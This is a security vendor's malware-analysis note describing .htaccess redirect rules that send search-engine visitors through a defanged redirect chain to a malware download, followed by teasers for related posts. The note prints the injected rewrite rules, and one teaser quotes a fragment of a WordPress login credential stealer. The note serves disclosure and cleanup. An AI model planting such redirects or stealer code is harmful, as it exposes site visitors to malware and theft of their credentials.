Sucuri Labs

Secondtds.mooo[.]com .htaccess redirects

We are finding many sites infected with malicious redirects inside the .htaccess file, to secondtds.mooo[.]com/go.php?sid=3. That domain is a TDS (traffic controller) which redirects visitors to another website pushing your browser to download this malware: https://www.virustotal.com/en/file/0b6eab15961f92da95a0a4b0d55fee8a8bd0eb39fec1027aa43575802d7a199e/analysis/1441223870/

The redirect chain is:

secondtds.mooo[.]com
downserver.ignorelist[.]com
pastdownload[.]com
stds1new.computersoftwarelive[.]com
download.pastdownload[.]com
files.september-master-3[.]xyz

Here is the .htaccess content:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} go.mail.* [OR]
RewriteCond %{HTTP_REFERER}  .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER}  .*bing.* [OR]
RewriteCond %{HTTP_REFERER}  .*goto.* [OR]
RewriteCond %{HTTP_REFERER}  .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER}  .*nigma.* [OR]
RewriteCond %{HTTP_REFERER}  .*mamma.* [OR]
..
RewriteCond %{HTTP_REFERER}  .*aport.* [OR]
RewriteCond %{HTTP_REFERER}  .*search.* [OR]
RewriteCond %{HTTP_REFERER}  .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER}  .*dogpile.*
RewriteRule ^(.*)$ http://secondtds[.]mooo.com[/]go.php?sid=2 [R=301,L]

The attack is quite buggy and doesn’t check whether a site is already infected, thus multiple identical redirect rules in the same .htaccess file.

If you find this code, remove it right away!

Krasimir Konov

Krasimir Konov is Sucuri's Malware Analyst who joined the company in 2014. Krasimir's main responsibilities include analyzing malicious code, signature creation and documentation of malware. His professional experience covers more than 10 years in the IT field, with nine years involved in IT/cyber security. When he’s not analyzing malware or writing Labs notes, you might find Krasimir riding his motorcycle and traveling the world. Connect with him on Twitter or LinkedIn.

Related Tags

Labs Note

Simple WP login stealer

Luke Leal
July 28, 2019

We recently found the following malicious code injected into wp-login.php on multiple compromised websites. \ } // End of login_header() $username_password=$_POST[‘log’].”—-xxxxx—-“.$_POST[‘pwd’].”ip:”.$_SERVER[‘REMOTE_ADDR’].$time = time().”\r\n”; $hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’); $write=fwrite($hellowp,$username_password,$time);…

Read the Post

Sucuri_encrypted: Magento Malware

Denis Sinegubko
October 17, 2019

In an effort to make malicious code appear to be credible, hackers commonly piggyback on the names of reputable, well-known companies and services. Typical examples…

Read the Post

Face Mask Spam Links Injected in WordPress Database

Luke Leal
April 2, 2020

During a recent malware removal request, we found a compromised WordPress site being used to redirect to spam websites. The campaign was leveraging an increase…

Read the Post

New wave of wp-vcd Malware

Krasimir Konov
November 13, 2017

Recently we saw a new wave of a known malware that injects malicious WordPress admin users to vulnerable or compromised sites.The malware, well analysed by…

Read the Post

Lack of controls when using WordPress’ update_option() with user input data equals plugin nightmare

John Castro
August 20, 2019

As mentioned in recent posts, WordPress’ update_option() function is used to update any option in the options database table. If the permission flow when using…

Read the Post

JavaScript Used to Generate Malicious Documents

Krasimir Konov
August 17, 2017

When talking about compromised environments, we often think that the website itself is the end goal but that’s not always true. In some cases, attackers…

Read the Post

Sucuri Labs

Malware Targets Mobile Platforms

Cesar Anjos
November 17, 2016

With the increase of mobile internet browsing, attackers have adapted their techniques to target such platforms and distribute SPAM & malware to these devices. Our…

Read the Post

Multi-Vector WordPress Infection from Examhome

Denis Sinegubko
September 18, 2018

This September, we’ve been seeing a massive infection wave that injects malicious JavaScript code into .js, .php files and the WordPress database.> The script looks…

Read the Post

xmlrpc.php Brute Force Tool

Luke Leal
May 9, 2019

We discovered a xmlrpc.php brute-force tool in a malicious PHP script that appears to have been uploaded months ago after a vulnerable GDPR plugin exploit:…

Read the Post

Missing DMARC Records Lead to Phishing

Kaushal Bhavsar
September 15, 2020

Email will continue to be the dominant mode of digital communication for the foreseeable future. However, the email framework was not designed with security in…

Read the Post

Related Tags

Related Categories

You May Also Like